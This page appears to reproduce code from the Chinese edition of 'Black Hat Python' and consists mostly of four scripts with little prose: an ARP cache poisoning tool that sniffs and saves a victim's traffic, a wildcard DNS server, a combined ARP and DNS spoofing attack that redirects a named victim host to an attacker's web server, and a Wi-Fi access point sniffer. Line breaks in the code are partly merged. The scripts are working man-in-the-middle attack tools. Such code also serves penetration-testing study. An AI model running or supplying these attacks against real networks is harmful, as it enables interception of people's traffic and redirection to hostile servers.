《Python黑帽子:黑客与渗透测试编程之道》 Scapy:网络的掌控者

时间:2022-07-08 18:11:39

利用Scapy进行ARP缓存投毒

#!/usr/bin/python
#coding=utf-8
from scapy.all import *
import os
import sys
import threading
import signal def restore_target(gateway_ip,gateway_mac,target_ip,target_mac): #以下代码中调用send函数的方式稍有不同
print "[*] Restoring target... "
send(ARP(op=2,psrc=gateway_ip,pdst=target_ip,hwdst="ff:ff:ff:ff:ff:ff",hwsrc=gateway_mac),count=5)
send(ARP(op=2,psrc=target_ip,pdst=gateway_ip,hwdst="ff:ff:ff:ff:ff:ff",hwsrc=target_mac),count=5) #发送退出信号到主线程
os.kill(os.getpid(),signal.SIGINT) def get_mac(ip_address): responses,unanswered = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip_address),timeout=2,retry=10) #返回从响应数据中获取的Mac地址
for s,r in responses:
return r[Ether].src return None def poison_target(gateway_ip,gateway_mac,target_ip,target_mac): poison_target = ARP()
poison_target.op = 2
poison_target.psrc = gateway_ip
poison_target.pdst = target_ip
poison_target.hwdst = target_mac poison_gateway = ARP()
poison_gateway.op = 2
poison_gateway.psrc = target_ip
poison_gateway.pdst = gateway_ip
poison_gateway.hwdst = gateway_mac print "[*] Beginning the ARP poison. [CTRL-C to stop]" while True:
try:
send(poison_target)
send(poison_gateway) time.sleep(2)
except KeyboardInterrupt:
restore_target(gateway_ip,gateway_mac,target_ip,target_mac) print "[*] ARP poison attack finished. "
return interface = "eth0"
target_ip = "10.10.10.134"    #被攻击主机
gateway_ip = "10.10.10.2"     #网关
packet_count = 1000        #攻击次数 #设置嗅探的网卡
conf.iface = interface #关闭输出
conf.verb = 0 print "[*] Setting up %s"%interface gateway_mac = get_mac(gateway_ip) if gateway_mac is None:
print "[!!!] Failed to get gateway MAC. Exiting. "
sys.exit(0)
else:
print "[*] Gateway %s is at %s"%(gateway_ip,gateway_mac) target_mac = get_mac(target_ip) if target_mac is None:
print "[!!!] Failed to get target MAC. Exiting. "
sys.exit(0)
else:
print "[*] Target %s is at %s"%(target_ip,target_mac) #启动ARP投毒攻击
poison_thread = threading.Thread(target=poison_target,args=(gateway_ip,gateway_mac,target_ip,target_mac))
poison_thread.start() try:
print "[*] Starting sniffer for %d packets"%packet_count bpf_filter = "ip host %s"%target_ip
packets = sniff(count=packet_count,filter=bpf_filter,iface=interface) #将捕获到的数据包输出到文件
wrpcap('arper.pcap',packets) #还原网络配置
restore_target(gateway_ip,gateway_mac,target_ip,target_mac) except KeyboardInterrupt:
#还原网络配置
restore_target(gateway_ip,gateway_mac,target_ip,target_mac)
sys.exit(0)

Python DNS 服务器实现

import socketserver,struct

class SinDNSQuery:
def __init__(self, data):
i = 1
self.name = ''
while True:
d = data[i]
if d == 0:
break;
if d < 32:
self.name = self.name + '.'
else:
self.name = self.name + chr(d)
i = i + 1
self.querybytes = data[0:i + 1]
(self.type, self.classify) = struct.unpack('>HH', data[i + 1:i + 5])
self.len = i + 5
def getbytes(self):
return self.querybytes + struct.pack('>HH', self.type, self.classify) class SinDNSAnswer:
def __init__(self, ip):
self.name = 49164
self.type = 1
self.classify = 1
self.timetolive = 190
self.datalength = 4
self.ip = ip
def getbytes(self):
res = struct.pack('>HHHLH', self.name, self.type, self.classify, self.timetolive, self.datalength)
s = self.ip.split('.')
res = res + struct.pack('BBBB', int(s[0]), int(s[1]), int(s[2]), int(s[3]))
return res class SinDNSFrame:
def __init__(self, data):
(self.id, self.flags, self.quests, self.answers, self.author, self.addition) = struct.unpack('>HHHHHH', data[0:12])
self.query = SinDNSQuery(data[12:])
def getname(self):
return self.query.name
def setip(self, ip):
self.answer = SinDNSAnswer(ip)
self.answers = 1
self.flags = 33152
def getbytes(self):
res = struct.pack('>HHHHHH', self.id, self.flags, self.quests, self.answers, self.author, self.addition)
res = res + self.query.getbytes()
if self.answers != 0:
res = res + self.answer.getbytes()
return res class SinDNSUDPHandler(socketserver.BaseRequestHandler):
def handle(self):
data = self.request[0].strip()
dns = SinDNSFrame(data)
socket = self.request[1]
namemap = SinDNSServer.namemap
if(dns.query.type==1):
name = dns.getname();
if namemap.__contains__(name):
dns.setip(namemap[name])
socket.sendto(dns.getbytes(), self.client_address)
elif namemap.__contains__('*'):
dns.setip(namemap['*'])
socket.sendto(dns.getbytes(), self.client_address)
else:
socket.sendto(data, self.client_address)
else:
socket.sendto(data, self.client_address)
print(self.client_address) class SinDNSServer:
def __init__(self, port=53):
SinDNSServer.namemap = {}
self.port = port
def addname(self, name, ip):
SinDNSServer.namemap[name] = ip
def start(self):
HOST, PORT = "0.0.0.0", self.port
server = socketserver.UDPServer((HOST, PORT), SinDNSUDPHandler)
server.serve_forever() if __name__ == "__main__":
server = SinDNSServer()
server.addname('www.lyshark.com', '192.168.1.20')
server.addname('*', '192.168.1.20')
server.start()

DNS欺骗之欺骗代码

import sys
import os
import threading
from scapy.all import *
from optparse import OptionParser #DNS欺骗函数
def DNS_Spoof(data):
if data.haslayer(DNS):
try:
#构造DNS AN数据
dns_an=DNSRR(rrname=data[DNS].qd.qname,rdata=jokers)
#构造IP/UDP数据包
repdata=IP(src=data[IP].dst,dst=data[IP].src)/UDP(dport=data[IP].sport,sport=53)
#构造DNS数据包
repdata/=DNS(id=data[DNS].id,qd=data[DNS].qd,qr=1,an=dns_an)
#攻击信息输出
print ('\nhancker ip :' + jokers + " url : "+data[DNS].qd.qname)
#发送数据包
send(repdata)
except Exception:
sys.exit(1) #DNS欺骗函数
def DNS_S(dns_ip,iface):
global jokers
jokers=dns_ip
print ("DNS欺骗开始!")
sniff(prn=DNS_Spoof,filter='udp dst port 53',iface=iface) #ARP欺骗函数
def op(eths,mubiao_ip,gateway_ip):
ip=mubiao_ip
wifi=gateway_ip
#目标设备MAC地址
dst_Mac=str(getmacbyip(ip))
#黑客设备mac地址
self_Mac=str(get_if_hwaddr(eths))
#网关MAC地址
wifi_Mac=str(getmacbyip(wifi))
#构造以太帧数据
Ether_data=Ether(src=self_Mac,dst=dst_Mac)/ARP(op=2,hwsrc=self_Mac,psrc=wifi,hwdst=dst_Mac,pdst=ip)
try:
#发送以太帧数据,sendp发送OSI模型中的二层数据
sendp(Ether_data,inter=2,iface=eths,loop=1)
except Exception as e:
print("目标ARP数据发送失败!") def wifi(eths,mubiao_ip,gateway_ip,dns_ip):
ip=gateway_ip
dst=mubiao_ip
et = eths
#根据IP获取MAC
dst_Mac = getmacbyip(ip)
#根据网卡获取MAC
self_Mac = get_if_hwaddr(et)
Ether_data = None #构造以太帧数据与ARP响应数据,ARP协议源地址给一个不存在的MAC地址与正确的IP地址对应,实现双向的无法解析,ARP协议的op参数是状态,2为响应数据,1为请求数据
Ether_data = Ether(src=self_Mac, dst=dst_Mac) / ARP(op=2, hwsrc='12:1a:13:a3:13:ef', psrc=dst, hwdst=dst_Mac, pdst=ip)
#新线程,开始DNS欺骗
t3 = threading.Thread(target=DNS_S, args=(dns_ip,eths))
t3.setDaemon(True)
t3.start()
try:
sendp(Ether_data, inter=2,iface=et,loop=1)
except Exception as e:
print("网关ARP数据发送失败!") def main():
try:
eth= "Realtek PCIe GBE Family Controller" # 网卡名称
mubiao="192.168.1.8" # 被害主机
gateway="192.168.1.1" # 网关
dip="192.168.1.20" # apache服务器地址
t1=threading.Thread(target=op,args=(eth,mubiao,gateway))
t1.setDaemon(True)
t1.start()
t2=threading.Thread(target=wifi,args=(eth,mubiao,gateway,dip))
t2.setDaemon(True)
t2.start()
except Exception as e:
print (e)
sys.exit(1) while True:
pass if __name__ == '__main__':
main()

无线网嗅探

#coding=utf-8

import os
import sys
import subprocess
from scapy.all import * RSN = 48 #管理帧信息元素(Dot11Elt)ID48是RSN信息
WPA = 221 #管理帧信息元素ID221是WPA信息
Dot11i = {0:'GroupCipher',
1:'WEP-40',
2:'TKIP',
4:'CCMP',
5:'WEP-104'
} #RSN信息的第6字节
WPA_Auth = {1:'802.11x/PMK',
2:'PSK'
} #RSN信息的第22字节
DN = open(os.devnull,'w') def get_wlan_interfaces():
'''
返回当前PC上所有的无线网卡以及网卡所处的模式
'''
interfaces = {'monitor':[],'managed':[],'all':[]}
proc = subprocess.Popen(['iwconfig'],stdout=subprocess.PIPE,stderr=DN)
lines = proc.communicate()[0].split('\n')
for line in lines:
if line:
if line[0] != ' ':
iface = line.split(' ')[0]
if 'Mode:Monitor' in line:
interfaces['monitor'].append(iface)
if 'IEEE 802.11' in line:
interfaces['managed'].append(iface)
interfaces['all'].append(iface)
if len(interfaces['managed']) == 0:
sys.exit('[!]没有无线网卡,请插入网卡')
return interfaces interfaces = get_wlan_interfaces() #获取当前的无线网卡 def get_strongest_inface():
'''
通过iwlist dev scan命令,根据无线网卡可获取到的AP数量来判断哪个网卡的功率最强
'''
iface_APs = []
#interfaces = get_wlan_interfaces()
for iface in interfaces['managed']:
count = 0
if iface:
proc = subprocess.Popen(['iwlist',iface,'scan'],stdout=subprocess.PIPE,stderr=DN)
lines = proc.communicate()[0].split('\n')
for line in lines:
if line:
if '- Address:' in line:
count += 1
iface_APs.append((count,iface))
interface = max(iface_APs)[1]
return interface def start_monitor_mode():
'''
通过airmon-ng工具将无线网卡启动为监听状态
'''
if interfaces['monitor']:
print '[*]监听网卡为:%s' % interfaces['monitor'][0]
return interfaces['monitor'][0]
interface = get_strongest_inface()
print '[*]网卡%s开启监听模式...' % interface
try:
os.system('/usr/sbin/airmon-ng start %s' % interface)
moni_inface = get_wlan_interfaces()['monitor']
print '[*]监听网卡为:%s' % moni_inface[0]
return moni_inface
except:
sys.exit('[!]无法开启监听模式') def get_AP_info(pkt):
'''
从Dot11数据包中获取AP的SSID,BSSID,chanle,加密等信息
'''
AP_info = {}
bssid = pkt[Dot11][Dot11Elt].info
ssid = pkt[Dot11].addr2
chanle = str(ord(pkt[Dot11][Dot11Elt][:3].info))
AP_infos = [bssid,chanle]
wpa_info,cipher_info = get_Dot11_RSN(pkt)
if wpa_info and cipher_info:
AP_infos = AP_infos + [wpa_info,cipher_info]
AP_info[ssid]=AP_infos
return AP_info APs_info = {}
def get_APs_info(pkt):
global APs_info
if pkt.haslayer(Dot11) and (pkt.haslayer(Dot11Beacon) or pkt.haslayer(Dot11ProbeResp)):
AP_info = get_AP_info(pkt) if not APs_info.has_key(AP_info.keys()[0]):
APs_info.update(AP_info)
return APs_info already_shows = []
def show_APs_info(pkt):
global already_shows
APs_info = get_APs_info(pkt)
for (key,value) in APs_info.items():
if key not in already_shows:
already_shows.append(key)
print '-' * 40
print ' [+]AP的BSSID:%s' % value[0]
print ' [+]AP的SSID:%s' % key
print ' [+]AP当前的chanle:%s' % value[1]
if len(value) == 4:
print ' [+]AP的认证方式为:%s' % value[2]
print ' [+]AP的加密算法为:%s' % value[3]
else:
print ' [+]开放验证!!'
print '-' * 40 def get_Dot11_RSN(pkt):
'''
从Beacon帧以及ProbeResponse帧获取cipher及auth信息
'''
ssid = pkt[Dot11].addr2
len_Elt = len(pkt[Dot11Elt].summary().split('/'))
#print pkt.show()
for i in range(len_Elt):
if pkt[Dot11Elt][i].ID == RSN:
try:
RSN_info = hexstr(pkt[Dot11Elt][i].info)
cipher_index = RSN_info.find('ac') #第一个00 0f ac 02中的‘02’代表cipher
auth_index = RSN_info.rfind('ac') #从后往前数第一个00 0f ac 02中的‘02’代表AUTH
cipher_num = int(RSN_info[(cipher_index + 3):(cipher_index + 5)])
auth_num = int(RSN_info[(auth_index + 3):(auth_index + 5)])
for key,value in Dot11i.items():
if cipher_num == key:
cipher_info = value
for key,value in WPA_Auth.items():
if auth_num == key:
wpa_info = value
#print wpa_info,cipher_info
return wpa_info,cipher_info
except:
pass
return None,None def sniffering(interface,action):
'''
嗅探5000个数据包
'''
print '[*]附近AP信息如下:'
sniff(iface=interface,prn=action,count=5000,store=0) def main():
moni_inface = start_monitor_mode()
sniffering(moni_inface, show_APs_info) if __name__ == '__main__':
main()